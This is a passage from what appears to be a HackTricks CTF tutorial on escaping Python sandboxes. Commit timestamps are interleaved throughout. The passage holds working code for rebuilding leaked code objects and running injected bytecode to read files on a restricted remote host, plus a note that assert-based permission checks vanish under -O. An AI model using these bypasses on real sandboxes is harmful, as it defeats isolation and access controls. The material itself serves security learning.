47 RETURN_VALUE
2020-07-15 15:43:14 +00:00
```
2021-10-18 11:21:18 +00:00
Notice that **if you cannot import `dis` in the python sandbox** you can obtain the **bytecode** of the function (`get_flag.func_code.co_code`) and **disassemble** it locally. You won't see the content of the variables being loaded (`LOAD_CONST`) but you can guess them from (`get_flag.func_code.co_consts`) because `LOAD_CONST` also tells the offset of the variable being loaded.
2020-07-15 15:43:14 +00:00
```python
dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S')
0 LOAD_CONST 1 (1)
3 STORE_FAST 1 (1)
6 LOAD_CONST 2 (2)
9 STORE_FAST 2 (2)
12 LOAD_CONST 3 (3)
15 LOAD_CONST 4 (4)
18 BUILD_LIST 2
21 STORE_FAST 3 (3)
24 LOAD_FAST 0 (0)
27 LOAD_FAST 2 (2)
30 COMPARE_OP 2 (==)
33 POP_JUMP_IF_FALSE 40
36 LOAD_CONST 5 (5)
39 RETURN_VALUE
>> 40 LOAD_CONST 6 (6)
43 RETURN_VALUE
44 LOAD_CONST 0 (0)
2021-01-18 14:15:45 +00:00
47 RETURN_VALUE
2020-07-15 15:43:14 +00:00
```
2022-07-02 18:05:33 +00:00
## Compiling Python
2021-10-06 14:43:31 +00:00
2022-09-12 21:12:49 +00:00
Now, let us imagine that somehow you can **dump the information about a function that you cannot execute** but you **need** to **execute** it.\
2021-11-30 16:46:07 +00:00
Like in the following example, you **can access the code object** of that function, but just reading the disassemble you **don't know how to calculate the flag** (_imagine a more complex `calc_flag` function_)
2021-10-06 14:43:31 +00:00
```python
def get_flag(some_input):
var1=1
var2="secretcode"
var3=["some","array"]
def calc_flag(flag_rot2):
return ''.join(chr(ord(c)-2) for c in flag_rot2)
if some_input == var2:
return calc_flag("VjkuKuVjgHnci")
else:
return "Nope"
```
2022-07-02 18:05:33 +00:00
### Creating the code object
2021-10-06 14:43:31 +00:00
First of all, we need to know **how to create and execute a code object** so we can create one to execute our function leaked:
```python
code_type = type((lambda: None).__code__)
2022-04-27 12:34:57 +00:00
# Check the following hint if you get an error in calling this
2021-10-06 14:43:31 +00:00
code_obj = code_type(co_argcount, co_kwonlyargcount,
co_nlocals, co_stacksize, co_flags,
co_code, co_consts, co_names,
co_varnames, co_filename, co_name,
co_firstlineno, co_lnotab, freevars=None,
cellvars=None)
# Execution
eval(code_obj) #Execute as a whole script
2022-05-01 12:41:36 +00:00
# If you have the code of a function, execute it
2021-10-06 14:43:31 +00:00
mydict = {}
mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")
```
2022-04-27 12:34:57 +00:00
{% hint style="info" %}
Depending on the python version the **parameters** of `code_type` may have a **different order** . The best way to know the order of the params in the python version you are running is to run:
```
import types
types.CodeType.__doc__
'code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n flags, codestring, constants, names, varnames, filename, name,\n firstlineno, lnotab[, freevars[, cellvars]])\n\nCreate a code object. Not for the faint of heart.'
```
{% endhint %}
2022-07-02 18:05:33 +00:00
### Recreating a leaked function
2021-10-06 14:43:31 +00:00
{% hint style="warning" %}
2022-09-12 21:12:49 +00:00
In the following example, we are going to take all the data needed to recreate the function from the function code object directly. In a **real example** , all the **values** to execute the function ** `code_type` ** is what **you will need to leak** .
2021-10-06 14:43:31 +00:00
{% endhint %}
```python
fc = get_flag.__code__
2021-10-06 15:45:31 +00:00
# In a real situation the values like fc.co_argcount are the ones you need to leak
2021-10-06 14:43:31 +00:00
code_obj = code_type(fc.co_argcount, fc.co_kwonlyargcount, fc.co_nlocals, fc.co_stacksize, fc.co_flags, fc.co_code, fc.co_consts, fc.co_names, fc.co_varnames, fc.co_filename, fc.co_name, fc.co_firstlineno, fc.co_lnotab, cellvars=fc.co_cellvars, freevars=fc.co_freevars)
2021-10-06 15:45:31 +00:00
2021-10-06 14:43:31 +00:00
mydict = {}
mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")
#ThisIsTheFlag
```
2022-07-02 18:05:33 +00:00
### Bypass Defenses
2021-10-06 14:43:31 +00:00
2023-03-19 18:16:17 +00:00
In previous examples at the beginning of this post, you can see **how to execute any python code using the `compile` function** . This is interesting because you can **execute whole scripts** with loops and everything in a **one liner** (and we could do the same using ** `exec` **).\
2021-10-18 11:21:18 +00:00
Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF machine** (for example because we don't have the `compiled` function in the CTF).
2021-10-06 14:43:31 +00:00
For example, let's compile and execute manually a function that reads _./poc.py_ :
```python
#Locally
def read():
return open("./poc.py",'r').read()
read.__code__.co_code
't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S'
```
```python
#On Remote
function_type = type(lambda: None)
code_type = type((lambda: None).__code__) #Get < type ' type ' >
consts = (None, "./poc.py", 'r')
bytecode = 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S'
names = ('open','read')
# And execute it using eval/exec
eval(code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '< module > ', 1, '', (), ()))
#You could also execute it directly
mydict = {}
mydict['__builtins__'] = __builtins__
codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '< module > ', 1, '', (), ())
function_type(codeobj, mydict, None, None, None)()
```
2022-09-12 21:12:49 +00:00
If you cannot access `eval` or `exec` you could create a **proper function** , but calling it directly is usually going to fail with: _constructor not accessible in restricted mode_ . So you need a **function not in the restricted environment to call this function.**
2021-10-06 14:43:31 +00:00
```python
#Compile a regular print
ftype = type(lambda: None)
ctype = type((lambda: None).func_code)
f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {})
f(42)
```
2022-07-02 18:05:33 +00:00
## Decompiling Compiled Python
2021-10-06 14:43:31 +00:00
2022-01-31 14:51:03 +00:00
Using tools like [**https://www.decompiler.com/** ](https://www.decompiler.com ) one can **decompile** given compiled python code.
2021-12-24 01:52:37 +00:00
**Check out this tutorial**:
2022-05-01 16:04:05 +00:00
{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
[.pyc.md ](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md )
2021-12-24 01:52:37 +00:00
{% endcontent-ref %}
2022-07-02 18:05:33 +00:00
## Misc Python
2021-12-24 01:52:37 +00:00
2022-07-02 18:05:33 +00:00
### Assert
2021-12-24 01:52:37 +00:00
Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug** .\
Therefore, checks like
```python
def check_permission(super_user):
try:
assert(super_user)
print("\nYou are a super user\n")
except AssertionError:
print(f"\nNot a Super User!!!\n")
```
2022-04-05 22:24:52 +00:00
will be bypassed
2021-10-06 14:43:31 +00:00
2022-07-02 18:05:33 +00:00
## References
2020-07-15 15:43:14 +00:00
* [https://lbarman.ch/blog/pyjail/ ](https://lbarman.ch/blog/pyjail/ )
* [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/ ](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/ )
* [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/ ](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/ )
2021-11-23 09:46:40 +00:00
* [https://gynvael.coldwind.pl/n/python\_sandbox\_escape ](https://gynvael.coldwind.pl/n/python\_sandbox\_escape )
* [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html ](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html )
2021-12-24 01:52:37 +00:00
* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6 ](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6 )
2022-04-28 16:01:33 +00:00
2023-09-02 23:48:41 +00:00
2023-09-02 23:51:32 +00:00
< figure > < img src = "/.gitbook/assets/image (675).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-09-02 23:48:41 +00:00
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free** ](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks ) today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks& utm_source=referral" %}
***
2022-04-28 16:01:33 +00:00
< details >
2023-12-30 20:49:23 +00:00
< summary > < strong > Learn AWS hacking from zero to hero with< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2023-12-30 20:49:23 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-09-30 10:43:59 +00:00
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2023-12-30 20:49:23 +00:00
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-06 03:10:38 +00:00
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**.**
2023-12-30 20:49:23 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2022-08-31 22:35:39 +00:00